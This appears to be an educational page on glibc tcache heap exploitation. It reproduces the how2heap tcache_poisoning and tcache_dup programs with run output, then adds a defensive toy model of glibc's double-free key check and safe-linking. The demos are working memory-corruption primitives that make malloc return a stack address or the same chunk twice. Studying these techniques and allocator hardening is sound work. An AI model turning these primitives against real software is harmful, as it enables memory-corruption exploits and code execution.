The how2heap tcache_poisoning program, with the allocation and final-malloc steps that the excerpt dropped restored from the run output:

```c
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

int main(void)
{
	printf("This file demonstrates a simple tcache poisoning attack by tricking malloc into\n"
	       "returning a pointer to an arbitrary location (in this case, the stack).\n"
	       "The attack is very similar to fastbin corruption attack.\n");
	printf("After the patch https://sourceware.org/git/?p=glibc.git;a=commit;h=77dc0d8643aa99c92bf671352b0a8adde705896f,\n"
	       "We have to create and free one more chunk for padding before fd pointer hijacking.\n\n");

	size_t stack_var;
	printf("The address we want malloc() to return is %p.\n", (char *)&stack_var);

	printf("Allocating 2 buffers.\n");
	intptr_t *a = malloc(128);
	printf("malloc(128): %p\n", a);
	intptr_t *b = malloc(128);
	printf("malloc(128): %p\n", b);

	/* both chunks land in the same tcache bin; b is freed last, so it is the head */
	printf("Freeing the buffers...\n");
	free(a);
	free(b);

	printf("Now the tcache list has [ %p -> %p ].\n", b, a);
	printf("We overwrite the first %lu bytes (fd/next pointer) of the data at %p\n"
	       "to point to the location to control (%p).\n", sizeof(intptr_t), b, &stack_var);
	/* the first 8 bytes of a freed chunk's user data are its tcache next pointer */
	b[0] = (intptr_t)&stack_var;
	printf("Now the tcache list has [ %p -> %p ].\n", b, &stack_var);

	printf("1st malloc(128): %p\n", malloc(128));
	printf("Now the tcache list has [ %p ].\n", &stack_var);

	intptr_t *c = malloc(128);
	printf("2nd malloc(128): %p\n", c);
	printf("We got the control\n");
	return 0;
}
```
```
grxer@grxer-virtual-machine /m/h/S/h/glibc_2.27> ./tcache_poisoning
This file demonstrates a simple tcache poisoning attack by tricking malloc into
returning a pointer to an arbitrary location (in this case, the stack).
The attack is very similar to fastbin corruption attack.
After the patch https://sourceware.org/git/?p=glibc.git;a=commit;h=77dc0d8643aa99c92bf671352b0a8adde705896f,
We have to create and free one more chunk for padding before fd pointer hijacking.

The address we want malloc() to return is 0x7fffffffe448.
Allocating 2 buffers.
malloc(128): 0x603260
malloc(128): 0x6032f0
Freeing the buffers...
Now the tcache list has [ 0x6032f0 -> 0x603260 ].
We overwrite the first 8 bytes (fd/next pointer) of the data at 0x6032f0
to point to the location to control (0x7fffffffe448).
Now the tcache list has [ 0x6032f0 -> 0x7fffffffe448 ].
1st malloc(128): 0x6032f0
Now the tcache list has [ 0x7fffffffe448 ].
2nd malloc(128): 0x7fffffffe448
We got the control
```
Overwriting the next pointer of the freed chunk in the tcache bin with the address we want malloc() to return is all it takes.

glibc 2.26 does not even check whether the size of a chunk taken from tcache is what it should be.
Tcache Dup
The how2heap tcache_dup program, with the two free() calls that the excerpt dropped restored from the run output:

```c
#include <stdio.h>
#include <stdlib.h>

int main(void)
{
	fprintf(stderr, "This file demonstrates a simple double-free attack with tcache.\n");

	fprintf(stderr, "Allocating buffer.\n");
	int *a = malloc(8);
	fprintf(stderr, "malloc(8): %p\n", a);

	/* the same chunk is freed twice; upstream glibc 2.27 has no tcache double-free check */
	fprintf(stderr, "Freeing twice...\n");
	free(a);
	free(a);

	fprintf(stderr, "Now the free list has [ %p, %p ].\n", a, a);
	fprintf(stderr, "Next allocated buffers will be same: [ %p, %p ].\n", malloc(8), malloc(8));

	return 0;
}
```
```
grxer@grxer-virtual-machine /m/h/S/h/glibc_2.27> ./tcache_dup
This file demonstrates a simple double-free attack with tcache.
Allocating buffer.
malloc(8): 0x555555756260
Freeing twice...
free(): double free detected in tcache
```

```
grxer@grxer:~$ ldd --version
ldd (Ubuntu GLIBC 2.27-3ubuntu1.6) 2.27
Copyright (C) 2018 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.
```
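Upstream glibc 2.27 has no double-free check in tcache, which is why how2heap expects the two malloc(8) calls to return the same chunk; the Ubuntu package in the ldd output above carries the per-chunk key check that glibc 2.29 introduced, so the run aborts at the second free instead. The following is an added example, not how2heap code and not glibc's source: a small model of a single tcache bin that implements the two checks a defender should know about for both programs on this page, the 2.29 key walk that stops the tcache_dup double free, and the safe-linking pointer mangling plus alignment check from glibc 2.32 that the raw next-pointer overwrite in tcache_poisoning runs into. It goes beyond the 2.26/2.27 builds discussed above on purpose. All addresses (ARENA_BASE, the chunk spacing, TCACHE_KEY, the target 0x7fffffffe440) are constructed so the arithmetic is reproducible; a real run would depend on ASLR.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed toy arena: chunk i sits at ARENA_BASE + i * CHUNK_SIZE. Fixed values
 * instead of real pointers keep the safe-linking arithmetic reproducible. */
#define ARENA_BASE ((uintptr_t)0x55555555a000)
#define CHUNK_SIZE ((uintptr_t)0x90)          /* the tcache size class malloc(128) lands in */
#define NCHUNKS    4
/* Constructed key. glibc 2.29 stores the tcache_perthread_struct address, 2.34+ a random value. */
#define TCACHE_KEY ((uintptr_t)0x4b455921)

/* First 16 bytes of a freed chunk's user data: next pointer, then the key (2.29+). */
typedef struct { uintptr_t next; uintptr_t key; } tcache_entry;

static tcache_entry chunks[NCHUNKS];  /* backing store for the constructed arena */
static uintptr_t bin_head;            /* tcache->entries[idx] for this size class */

typedef enum { TC_OK, TC_DOUBLE_FREE, TC_UNALIGNED } tc_status;

static uintptr_t chunk_addr(int i) { return ARENA_BASE + (uintptr_t)i * CHUNK_SIZE; }

/* Map a constructed address back to its entry; NULL if it points outside the arena. */
static tcache_entry *lookup(uintptr_t addr) {
    if (addr < ARENA_BASE) return NULL;
    uintptr_t off = addr - ARENA_BASE;
    if (off % CHUNK_SIZE != 0 || off / CHUNK_SIZE >= NCHUNKS) return NULL;
    return &chunks[off / CHUNK_SIZE];
}

/* glibc 2.32 safe-linking: the stored next pointer is XORed with the page number of the
 * slot it is stored in. PROTECT_PTR and REVEAL_PTR are the same operation. */
static uintptr_t protect_ptr(uintptr_t pos, uintptr_t ptr) { return (pos >> 12) ^ ptr; }
static bool aligned_ok(uintptr_t p) { return (p & (uintptr_t)0xf) == 0; }

static void tc_reset(void) { memset(chunks, 0, sizeof chunks); bin_head = 0; }

/* tcache_put plus the 2.29 double-free check: a chunk whose key field already holds the
 * key is probably in the bin, so walk the bin to confirm before aborting. */
static tc_status tc_free(uintptr_t addr) {
    tcache_entry *e = lookup(addr);
    if (e == NULL) return TC_OK;                  /* foreign pointer: not modelled here */
    if (e->key == TCACHE_KEY) {
        for (uintptr_t p = bin_head; p != 0;) {
            if (p == addr) return TC_DOUBLE_FREE; /* "free(): double free detected in tcache 2" */
            tcache_entry *pe = lookup(p);
            p = pe ? protect_ptr(p, pe->next) : 0;
        }
    }
    e->key = TCACHE_KEY;
    e->next = protect_ptr(addr, bin_head);
    bin_head = addr;
    return TC_OK;
}

/* tcache_get with the safe-linking alignment check on the chunk about to be handed out. */
static tc_status tc_malloc(uintptr_t *out) {
    uintptr_t addr = bin_head;
    if (out) *out = 0;
    if (addr == 0) return TC_OK;                  /* bin empty: real malloc tries other bins */
    if (!aligned_ok(addr)) return TC_UNALIGNED;   /* "malloc(): unaligned tcache chunk detected" */
    tcache_entry *e = lookup(addr);
    bin_head = e ? protect_ptr(addr, e->next) : 0;
    if (e) e->key = 0;                            /* an allocated chunk no longer carries the key */
    if (out) *out = addr;
    return TC_OK;
}

/* Honest free/free/malloc/malloc round trip: mangling is invisible to correct code. */
static bool roundtrip_demo(void) {
    tc_reset();
    uintptr_t a = chunk_addr(0), b = chunk_addr(1), x, y;
    tc_free(a); tc_free(b);
    return tc_malloc(&x) == TC_OK && tc_malloc(&y) == TC_OK && x == b && y == a;
}

/* The tcache_dup sequence free(a); free(a): the second free is caught by the key walk. */
static tc_status double_free_demo(void) {
    tc_reset();
    uintptr_t a = chunk_addr(0);
    tc_free(a);
    return tc_free(a);
}

/* The tcache_poisoning sequence: free a, free b, write a raw target over b's next, allocate
 * twice. The first malloc still returns b, but the head then becomes REVEAL_PTR(b, target),
 * garbage rather than target, and the second malloc rejects it as unaligned. */
static tc_status poisoning_demo(uintptr_t target, uintptr_t *first) {
    tc_reset();
    uintptr_t a = chunk_addr(0), b = chunk_addr(1), second;
    tc_free(a); tc_free(b);
    lookup(b)->next = target;                     /* the b[0] = (intptr_t)&stack_var write */
    tc_malloc(first);
    return tc_malloc(&second);
}

int main(void) {
    uintptr_t first = 0;
    printf("round trip ok: %d\n", roundtrip_demo());
    printf("double free: %s\n", double_free_demo() == TC_DOUBLE_FREE ? "detected" : "missed");
    tc_status s = poisoning_demo((uintptr_t)0x7fffffffe440, &first);  /* constructed stack address */
    printf("poisoning: 1st malloc %#lx, 2nd malloc %s\n", (unsigned long)first,
           s == TC_UNALIGNED ? "rejected as unaligned" : "succeeded");
    return 0;
}
```

Two caveats that matter when reading the model. The alignment check only fires when the revealed garbage happens to be misaligned, so on its own it is a heuristic; the actual protection of safe-linking is that a correct next pointer can only be written by someone who already knows the page address of the chunk it is stored in. The key check is likewise only as strong as the key: 2.29 used the tcache struct's address, which is a predictable heap value, and 2.34 moved to a random key for that reason.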